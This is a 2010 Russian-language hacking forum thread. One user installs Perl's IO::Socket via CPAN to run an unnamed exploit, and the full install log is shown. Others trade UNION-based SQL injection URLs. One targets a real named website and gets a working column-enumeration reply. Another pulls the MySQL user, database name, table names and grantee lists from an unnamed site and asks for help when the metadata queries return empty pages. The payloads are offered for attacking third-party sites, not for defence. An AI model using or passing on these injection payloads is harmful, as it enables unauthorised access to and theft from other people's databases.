08.07.2010, 19:06
|
|
Новичок
Регистрация: 30.05.2010
Сообщений: 25
С нами:
8395840
Репутация:
5
|
|
А где перл обычно лежит? Убунта)
|
|
|
08.07.2010, 19:16
|
|
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
С нами:
9431076
Репутация:
229
|
|
Сообщение от Boa
А где перл обычно лежит? Убунта)
тогда кидай модуль в один из этих путей в папку IO
/etc/perl
/usr/local/lib/perl/5.10.1
/usr/local/share/perl/5.10.1
/usr/lib/perl5
/usr/share/perl5
/usr/lib/perl/5.10
/usr/share/perl/5.10
|
|
|
|
09.07.2010, 11:49
|
|
Новичок
Регистрация: 30.05.2010
Сообщений: 25
С нами:
8395840
Репутация:
5
|
|
Гм, в /etc/perl/IO положил Socket.pm, но ошибка все равно такая. Или надо класть во все каталоги?
|
|
|
|
09.07.2010, 12:05
|
|
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
С нами:
8854580
Репутация:
34
|
|
Boa в терминале выполни:
sudo perl -MCPAN -e shell
install IO:Socket
|
|
|
|
09.07.2010, 12:38
|
|
Новичок
Регистрация: 27.05.2010
Сообщений: 13
С нами:
8399502
Репутация:
0
|
|
почему этого сайта не показывай номер?
http://www.nrhz.de/flyer/beitrag.php?id=-9999 and 1=0 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25--&service_menu=Termine
Я попытаться изменить --,/*, предела, name_const, но не результат?
|
|
|
|
09.07.2010, 12:47
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от haito
почему этого сайта не показывай номер?
http://www.nrhz.de/flyer/beitrag.php?id=-9999 and 1=0 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25--&service_menu=Termine
Я попытаться изменить --,/*, предела, name_const, но не результат?
http://www.nrhz.de/flyer/beitrag.php?id=15330+and+1=0+union+select+1,2,3,4, 5,6,7,8,9,aes_decrypt(aes_encrypt(version(),1),1), 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
Column 10
|
|
|
|
09.07.2010, 13:43
|
|
Новичок
Регистрация: 30.05.2010
Сообщений: 25
С нами:
8395840
Репутация:
5
|
|
daniel_1024 гм, набрал, вот такие ужасы:
Код:
yaroslav@yaroslav-desktop:~$ sudo perl -MCPAN -e shell
Terminal does not support AddHistory.
cpan shell -- CPAN exploration and modules installation (v1.9402)
Enter 'h' for help.
cpan[1]> h
Display Information (ver 1.9402)
command argument description
a,b,d,m WORD or /REGEXP/ about authors, bundles, distributions, modules
i WORD or /REGEXP/ about any of the above
ls AUTHOR or GLOB about files in the author's directory
(with WORD being a module, bundle or author name or a distribution
name of the form AUTHOR/DISTRIBUTION)
Download, Test, Make, Install...
get download clean make clean
make make (implies get) look open subshell in dist directory
test make test (implies make) readme display these README files
install make install (implies test) perldoc display POD documentation
Upgrade
r WORDs or /REGEXP/ or NONE report updates for some/matching/all modules
upgrade WORDs or /REGEXP/ or NONE upgrade some/matching/all modules
Pragmas
force CMD try hard to do command fforce CMD try harder
notest CMD skip testing
Other
h,? display this menu ! perl-code eval a perl command
o conf [opt] set and query options q quit the cpan shell
reload cpan load CPAN.pm again reload index load newer indices
autobundle Snapshot recent latest CPAN uploads
cpan[2]> install IO:Socket
CPAN: Storable loaded ok (v2.20)
Going to read '/home/yaroslav/.cpan/Metadata'
Database was generated on Fri, 09 Jul 2010 06:27:12 GMT
Running install for module 'IO::Socket'
CPAN: Data::Dumper loaded ok (v2.124)
'YAML' not installed, falling back to Data::Dumper and Storable to read prefs '/home/yaroslav/.cpan/prefs'
Running make for G/GB/GBARR/IO-1.25.tar.gz
CPAN: Digest::SHA loaded ok (v5.47)
CPAN: Compress::Zlib loaded ok (v2.02)
Checksum for /home/yaroslav/.cpan/sources/authors/id/G/GB/GBARR/IO-1.25.tar.gz ok
Scanning cache /home/yaroslav/.cpan/build for sizes
............................................................................DONE
CPAN: Archive::Tar loaded ok (v1.52)
IO-1.25/
IO-1.25/ChangeLog
IO-1.25/IO.pm
IO-1.25/IO.xs
IO-1.25/lib/
IO-1.25/lib/IO/
IO-1.25/lib/IO/Dir.pm
IO-1.25/lib/IO/File.pm
IO-1.25/lib/IO/Handle.pm
IO-1.25/lib/IO/Pipe.pm
IO-1.25/lib/IO/Poll.pm
IO-1.25/lib/IO/Seekable.pm
IO-1.25/lib/IO/Select.pm
IO-1.25/lib/IO/Socket/
IO-1.25/lib/IO/Socket/INET.pm
IO-1.25/lib/IO/Socket/UNIX.pm
IO-1.25/lib/IO/Socket.pm
IO-1.25/Makefile.PL
IO-1.25/MANIFEST
IO-1.25/META.yml
IO-1.25/poll.c
IO-1.25/poll.h
IO-1.25/README
IO-1.25/SIGNATURE
IO-1.25/t/
IO-1.25/t/IO.t
IO-1.25/t/io_const.t
IO-1.25/t/io_dir.t
IO-1.25/t/io_dup.t
IO-1.25/t/io_file.t
IO-1.25/t/io_linenum.t
IO-1.25/t/io_multihomed.t
IO-1.25/t/io_pipe.t
IO-1.25/t/io_poll.t
IO-1.25/t/io_sel.t
IO-1.25/t/io_sock.t
IO-1.25/t/io_taint.t
IO-1.25/t/io_tell.t
IO-1.25/t/io_udp.t
IO-1.25/t/io_unix.t
IO-1.25/t/io_utf8.t
IO-1.25/t/io_xs.t
IO-1.25/t/test.pl
CPAN: File::Temp loaded ok (v0.22)
CPAN.pm: Going to build G/GB/GBARR/IO-1.25.tar.gz
Checking if your kit is complete...
Looks good
Writing Makefile for IO
Could not read '/home/yaroslav/.cpan/build/IO-1.25-BM9Gl0/META.yml'. Falling back to other methods to determine prerequisites
cp lib/IO/Pipe.pm blib/lib/IO/Pipe.pm
cp lib/IO/File.pm blib/lib/IO/File.pm
cp lib/IO/Select.pm blib/lib/IO/Select.pm
cp lib/IO/Socket/INET.pm blib/lib/IO/Socket/INET.pm
cp lib/IO/Socket.pm blib/lib/IO/Socket.pm
cp lib/IO/Socket/UNIX.pm blib/lib/IO/Socket/UNIX.pm
cp lib/IO/Poll.pm blib/lib/IO/Poll.pm
cp lib/IO/Handle.pm blib/lib/IO/Handle.pm
cp lib/IO/Dir.pm blib/lib/IO/Dir.pm
cp lib/IO/Seekable.pm blib/lib/IO/Seekable.pm
cp IO.pm blib/lib/IO.pm
/usr/bin/perl /usr/share/perl/5.10/ExtUtils/xsubpp -typemap /usr/share/perl/5.10/ExtUtils/typemap IO.xs > IO.xsc && mv IO.xsc IO.c
cc -c -D_REENTRANT -D_GNU_SOURCE -DDEBIAN -fno-strict-aliasing -pipe -fstack-protector -I/usr/local/include -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64 -O2 -g -DVERSION=\"1.25\" -DXS_VERSION=\"1.25\" -fPIC "-I/usr/lib/perl/5.10/CORE" IO.c
cc -c -D_REENTRANT -D_GNU_SOURCE -DDEBIAN -fno-strict-aliasing -pipe -fstack-protector -I/usr/local/include -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64 -O2 -g -DVERSION=\"1.25\" -DXS_VERSION=\"1.25\" -fPIC "-I/usr/lib/perl/5.10/CORE" poll.c
Running Mkbootstrap for IO ()
chmod 644 IO.bs
rm -f blib/arch/auto/IO/IO.so
cc -shared -O2 -g -L/usr/local/lib -fstack-protector IO.o poll.o -o blib/arch/auto/IO/IO.so \
\
chmod 755 blib/arch/auto/IO/IO.so
cp IO.bs blib/arch/auto/IO/IO.bs
chmod 644 blib/arch/auto/IO/IO.bs
Manifying blib/man3/IO::Pipe.3pm
Manifying blib/man3/IO::File.3pm
Manifying blib/man3/IO::Select.3pm
Manifying blib/man3/IO::Socket::INET.3pm
Manifying blib/man3/IO::Socket.3pm
Manifying blib/man3/IO::Socket::UNIX.3pm
Manifying blib/man3/IO::Poll.3pm
Manifying blib/man3/IO::Handle.3pm
Manifying blib/man3/IO::Dir.3pm
Manifying blib/man3/IO::Seekable.3pm
Manifying blib/man3/IO.3pm
GBARR/IO-1.25.tar.gz
/usr/bin/make -- OK
Warning (usually harmless): 'YAML' not installed, will not store persistent state
Running make test
PERL_DL_NONLAZY=1 /usr/bin/perl "-MExtUtils::Command::MM" "-e" "test_harness(0, 'blib/lib', 'blib/arch')" t/*.t
t/IO.t ............. ok
t/io_const.t ....... ok
t/io_dir.t ......... ok
t/io_dup.t ......... ok
t/io_file.t ........ ok
t/io_linenum.t ..... ok
t/io_multihomed.t .. ok
t/io_pipe.t ........ ok
t/io_poll.t ........ ok
t/io_sel.t ......... ok
t/io_sock.t ........ ok
t/io_taint.t ....... ok
t/io_tell.t ........ ok
t/io_udp.t ......... ok
t/io_unix.t ........ ok
t/io_utf8.t ........ ok
t/io_xs.t .......... ok
All tests successful.
Files=17, Tests=180, 22 wallclock secs ( 0.06 usr 0.02 sys + 0.40 cusr 0.09 csys = 0.57 CPU)
Result: PASS
GBARR/IO-1.25.tar.gz
/usr/bin/make test -- OK
Warning (usually harmless): 'YAML' not installed, will not store persistent state
Running make install
Prepending /home/yaroslav/.cpan/build/IO-1.25-BM9Gl0/blib/arch /home/yaroslav/.cpan/build/IO-1.25-BM9Gl0/blib/lib to PERL5LIB for 'install'
Files found in blib/arch: installing files in blib/lib into architecture dependent library tree
Installing /usr/local/lib/perl/5.10.1/auto/IO/IO.so
Appending installation info to /usr/local/lib/perl/5.10.1/perllocal.pod
GBARR/IO-1.25.tar.gz
/usr/bin/make install -- OK
Warning (usually harmless): 'YAML' not installed, will not store persistent state
cpan[3]>
Сплоит использовать по прежнему не получается( |
|
|
|
09.07.2010, 15:20
|
|
Новичок
Регистрация: 04.12.2005
Сообщений: 6
С нами:
10753628
Репутация:
1
|
|
Всем привет!
Обнаружилась на одном ресурсе уязвимость. Проведя SQL injection удалось с помощью функций MySQL user() и database() узнать, соответственно, имя пользователя и базы в СУБД:
Код:
http://example.com/detail.php?id=-1+UNION+SELECT+1,user(),3,4,5+--+
Код:
http://example.com/detail.php?id=-1+UNION+SELECT+1,database(),3,4,5+--+
Далее, используя переведенное в hex полученное имя БД, я предпринял попытку выудить имена таблиц запросом к INFORMATION_SCHEMA:
Код:
http://example.com/detail.php?id=-1+UNION+SELECT+1,table_name,3,4,5+from+information_schema.tables+where+table_schema=0x643630363138313039+--+
Ничто не предвещало сложностей, но результат я так и не получил. Любые запросы к базе с метаданными сопровождаются непонятной длительной загрузкой данных с сервера и успешной (код 200) выдачей пустой HTML-страницы.
Доступ к INFORMATION_SCHEMA есть - отработал запрос
Код:
http://example.com/detail.php?id=-1+UNION+SELECT+1,GRANTEE,3,4,5+FROM+INFORMATION_SC HEMA.USER_PRIVILEGES+--+[/u]
и выдал мне идентификатор пользователя.
Пробовал указывать LIMIT 1 - результат тот же.
Кстати, хотел посмотреть COUNT(*) - то же самое.
Версия MySQL-сервера 5.0.77-log.
Кто сталкивался с подобным? Какие будут советы? Рекомендации?
Спасибо за любые подсказки! |
|
|
|
09.07.2010, 15:25
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Decoy
без линка вряд ли cмогут помочь тебя
|
|
|
|
09.07.2010, 15:30
|
|
Новичок
Регистрация: 04.12.2005
Сообщений: 6
С нами:
10753628
Репутация:
1
|
|
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
